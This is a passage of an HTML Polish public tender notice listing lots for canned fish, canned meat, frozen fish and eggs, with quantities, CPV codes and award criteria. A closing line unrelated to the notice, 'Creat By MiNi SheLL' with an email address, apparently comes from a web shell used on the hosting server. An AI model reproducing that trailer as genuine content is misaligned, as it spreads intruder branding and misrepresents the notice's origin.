<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> (1.)Szprot w oleju - 170 g szt 700 (2.)Szprot w pomidorach - 170 g szt 700 (3.)Śledź w pomidorach - 170 g szt 600 (4.)Śledź w oleju - 170 g szt 700 (5.)Paprykarz - 300 g szt 900 (6.)Śledź w śmietanie mały - 150 g szt 210 (7.)Śledź opiekany - słoik - 0,9 l szt 400 (8.)Sałatka rybna - 170 g szt 1600 (9.)Szprot w pomidorach lub w oleju - 125 g szt 1400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.24.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas na wymianę wadliwego artykułu lub o obniżonej jakości na artykuły właściwe jakościowo - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Dostawa konserw mięsnych oraz pasztecików.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> (1.)Mielonka konserwowa - 300 g szt 3000 (2.)Pasztet drobiowy - 300 g szt 1200 (3.)Pasztecik - 130 g szt 2000 (4.)Smalec z mięsem - 130 g szt 2000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.17.00-2, 15.13.13.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas na wymianę wadliwego artykułu lub o obniżonej jakości na artykuły właściwe jakościowo - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Dostawa ryb świeżych i mrożonych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> (1.)Filet śledziowy matias - wiaderko kg 150 (2.)Kostka panierowana mrożona z mintaja kg 250 (3.)Makrela wędzona kg 60 (4.)Filet z miruny mrożony glazura do 10%
kg 35 (5.)Polędwiczki z mintaja mrożone glazura do 10% kg 35.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6, 15.21.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas na wymianę wadliwego artykułu lub o obniżonej jakości na artykuły właściwe jakościowo - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Dostawa jaj.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> (1.)Jaja klasa M z chowu klatkowego od 53 g do 63 g szt 22320.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas na wymianę wadliwego artykułu lub o obniżonej jakości na artykuły właściwe jakościowo - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com